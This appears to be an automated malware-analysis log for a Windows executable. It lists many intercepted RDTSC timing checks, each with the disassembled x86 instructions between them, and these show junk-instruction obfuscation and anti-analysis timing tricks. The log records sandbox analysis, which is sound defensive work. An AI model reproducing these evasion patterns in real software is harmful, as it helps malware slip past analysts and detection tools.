Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0524 second address: 75B0543 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 movzx ecx, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esi, eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9308CAD92Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0543 second address: 75B0558 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C681h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0558 second address: 75B058A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F9308CAD92Eh 0x00000010 je 00007F9378BDCA51h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov cx, di 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B058A second address: 75B05C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C685h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007F930851C687h 0x00000010 mov dword ptr [esi], edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B05C4 second address: 75B05C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B05C8 second address: 75B05CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B05CE second address: 75B0630 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD92Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c jmp 00007F9308CAD930h 0x00000011 mov dword ptr [esi+08h], eax 0x00000014 pushad 0x00000015 mov edi, ecx 0x00000017 mov dx, si 0x0000001a popad 0x0000001b mov dword ptr [esi+0Ch], eax 0x0000001e jmp 00007F9308CAD934h 0x00000023 mov eax, dword ptr [ebx+4Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov dl, 8Bh 0x0000002b call 00007F9308CAD936h 0x00000030 pop eax 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0630 second address: 75B0636 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0636 second address: 75B063A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B063A second address: 75B063E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B063E second address: 75B065D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+10h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9308CAD930h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B065D second address: 75B066C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C67Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B066C second address: 75B06A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007F9308CAD930h 0x0000000c xor cx, 3418h 0x00000011 jmp 00007F9308CAD92Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+50h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B06A0 second address: 75B06BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C687h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B06BB second address: 75B0721 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c pushad 0x0000000d mov ax, 0733h 0x00000011 call 00007F9308CAD938h 0x00000016 mov ecx, 1D7B1F11h 0x0000001b pop eax 0x0000001c popad 0x0000001d mov eax, dword ptr [ebx+54h] 0x00000020 jmp 00007F9308CAD92Dh 0x00000025 mov dword ptr [esi+18h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F9308CAD92Dh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0721 second address: 75B0753 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C681h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c pushad 0x0000000d call 00007F930851C67Ch 0x00000012 pop edi 0x00000013 mov cl, DDh 0x00000015 popad 0x00000016 mov dword ptr [esi+1Ch], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0753 second address: 75B0757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0757 second address: 75B075B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B075B second address: 75B0761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0761 second address: 75B077D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F930851C688h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B077D second address: 75B07FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+5Ch] 0x0000000b pushad 0x0000000c pushad 0x0000000d mov di, 691Eh 0x00000011 movsx ebx, ax 0x00000014 popad 0x00000015 pushfd 0x00000016 jmp 00007F9308CAD930h 0x0000001b or esi, 000693E8h 0x00000021 jmp 00007F9308CAD92Bh 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esi+20h], eax 0x0000002b jmp 00007F9308CAD936h 0x00000030 mov eax, dword ptr [ebx+60h] 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F9308CAD92Ah 0x0000003a adc cx, B178h 0x0000003f jmp 00007F9308CAD92Bh 0x00000044 popfd 0x00000045 popad 0x00000046 mov dword ptr [esi+24h], eax 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c mov ecx, edx 0x0000004e mov bx, FFF2h 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B07FD second address: 75B0821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 mov eax, 05B14B31h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebx+64h] 0x00000011 pushad 0x00000012 mov di, si 0x00000015 mov bx, ax 0x00000018 popad 0x00000019 mov dword ptr [esi+28h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov bl, 83h 0x00000021 mov al, D5h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0821 second address: 75B087F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD930h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+68h] 0x0000000c jmp 00007F9308CAD930h 0x00000011 mov dword ptr [esi+2Ch], eax 0x00000014 jmp 00007F9308CAD930h 0x00000019 mov ax, word ptr [ebx+6Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push edx 0x00000021 pop ecx 0x00000022 call 00007F9308CAD939h 0x00000027 pop esi 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B087F second address: 75B0885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0885 second address: 75B0889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0889 second address: 75B08F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C688h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [esi+30h], ax 0x0000000f jmp 00007F930851C680h 0x00000014 mov ax, word ptr [ebx+00000088h] 0x0000001b jmp 00007F930851C680h 0x00000020 mov word ptr [esi+32h], ax 0x00000024 jmp 00007F930851C680h 0x00000029 mov eax, dword ptr [ebx+0000008Ch] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B08F2 second address: 75B08F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B08F6 second address: 75B08FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B08FC second address: 75B0969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, C3h 0x00000005 pushfd 0x00000006 jmp 00007F9308CAD937h 0x0000000b jmp 00007F9308CAD933h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov dword ptr [esi+34h], eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F9308CAD92Bh 0x0000001e add si, 08EEh 0x00000023 jmp 00007F9308CAD939h 0x00000028 popfd 0x00000029 popad 0x0000002a mov eax, dword ptr [ebx+18h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0969 second address: 75B096D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B096D second address: 75B0971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0971 second address: 75B0977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0977 second address: 75B09C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD932h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c pushad 0x0000000d mov al, D2h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F9308CAD939h 0x00000017 sbb al, 00000036h 0x0000001a jmp 00007F9308CAD931h 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B09C4 second address: 75B0A5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C680h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [ebx+1Ch] 0x0000000d jmp 00007F930851C680h 0x00000012 mov dword ptr [esi+3Ch], eax 0x00000015 pushad 0x00000016 mov esi, 45C9B25Dh 0x0000001b pushfd 0x0000001c jmp 00007F930851C67Ah 0x00000021 or ecx, 78F0B2B8h 0x00000027 jmp 00007F930851C67Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov eax, dword ptr [ebx+20h] 0x00000031 jmp 00007F930851C686h 0x00000036 mov dword ptr [esi+40h], eax 0x00000039 jmp 00007F930851C680h 0x0000003e lea eax, dword ptr [ebx+00000080h] 0x00000044 jmp 00007F930851C680h 0x00000049 push 00000001h 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0A5D second address: 75B0A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0A61 second address: 75B0A65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0A65 second address: 75B0A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0A6B second address: 75B0AA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F930851C682h 0x00000008 pop ecx 0x00000009 mov eax, edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F930851C689h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0AA2 second address: 75B0ABF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0ABF second address: 75B0AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0AC6 second address: 75B0ACF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, E157h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0ACF second address: 75B0AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 lea eax, dword ptr [ebp-10h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov al, bh 0x0000000f mov eax, 78BA679Dh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0AE4 second address: 75B0AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0AEA second address: 75B0AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0B5B second address: 75B0B6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0B6A second address: 75B0BDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 05h 0x00000005 jmp 00007F930851C680h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebp-0Ch] 0x00000010 jmp 00007F930851C680h 0x00000015 mov dword ptr [esi+04h], eax 0x00000018 jmp 00007F930851C680h 0x0000001d lea eax, dword ptr [ebx+78h] 0x00000020 pushad 0x00000021 mov si, 7E6Dh 0x00000025 movzx eax, bx 0x00000028 popad 0x00000029 push 00000001h 0x0000002b jmp 00007F930851C685h 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F930851C67Dh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0BDB second address: 75B0BE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0BE1 second address: 75B0C24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C683h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F930851C689h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F930851C67Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0C24 second address: 75B0C55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-08h] 0x0000000c jmp 00007F9308CAD935h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9308CAD92Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0C55 second address: 75B0C9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F930851C687h 0x00000009 sbb cx, 7A7Eh 0x0000000e jmp 00007F930851C689h 0x00000013 popfd 0x00000014 mov ch, D4h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d mov cl, 67h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0C9A second address: 75B0CE4 instructions: 0x00000000 rdtsc 0x00000002 call 00007F9308CAD92Bh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9308CAD92Fh 0x00000011 and ch, 0000003Eh 0x00000014 jmp 00007F9308CAD939h 0x00000019 popfd 0x0000001a mov di, ax 0x0000001d popad 0x0000001e popad 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0CE4 second address: 75B0CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0CE8 second address: 75B0CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0CEE second address: 75B0CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0CF4 second address: 75B0CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0D24 second address: 75B0D3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C682h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0D3A second address: 75B0D75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007F9308CAD936h 0x00000010 js 00007F9378BDC27Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F9308CAD92Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0D75 second address: 75B0D79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0D79 second address: 75B0D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0D7F second address: 75B0DC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C67Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d mov si, 81CDh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F930851C688h 0x00000019 add cx, A618h 0x0000001e jmp 00007F930851C67Bh 0x00000023 popfd 0x00000024 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0DC5 second address: 75B0DE3 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9308CAD931h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0DE3 second address: 75B0DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F930851C67Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0DF3 second address: 75B0E54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+70h] 0x0000000e pushad 0x0000000f movzx esi, dx 0x00000012 mov si, di 0x00000015 popad 0x00000016 push 00000001h 0x00000018 pushad 0x00000019 movsx ebx, ax 0x0000001c movzx eax, di 0x0000001f popad 0x00000020 push ebx 0x00000021 pushad 0x00000022 pushad 0x00000023 mov esi, 29371895h 0x00000028 pushfd 0x00000029 jmp 00007F9308CAD932h 0x0000002e or ch, 00000068h 0x00000031 jmp 00007F9308CAD92Bh 0x00000036 popfd 0x00000037 popad 0x00000038 movzx eax, di 0x0000003b popad 0x0000003c mov dword ptr [esp], eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov eax, 438ED8F3h 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0E54 second address: 75B0E5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0E5A second address: 75B0E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0E5E second address: 75B0E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-18h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007F930851C686h 0x00000014 xor cx, 7128h 0x00000019 jmp 00007F930851C67Bh 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0F13 second address: 75B0F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0F17 second address: 75B0F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0F1B second address: 75B0F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0F21 second address: 75B0F6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F930851C684h 0x00000009 jmp 00007F930851C685h 0x0000000e popfd 0x0000000f mov cx, 7E87h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov edi, eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007F930851C67Fh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0F6C second address: 75B0F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0F71 second address: 75B0F8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C67Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0F8C second address: 75B0F92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
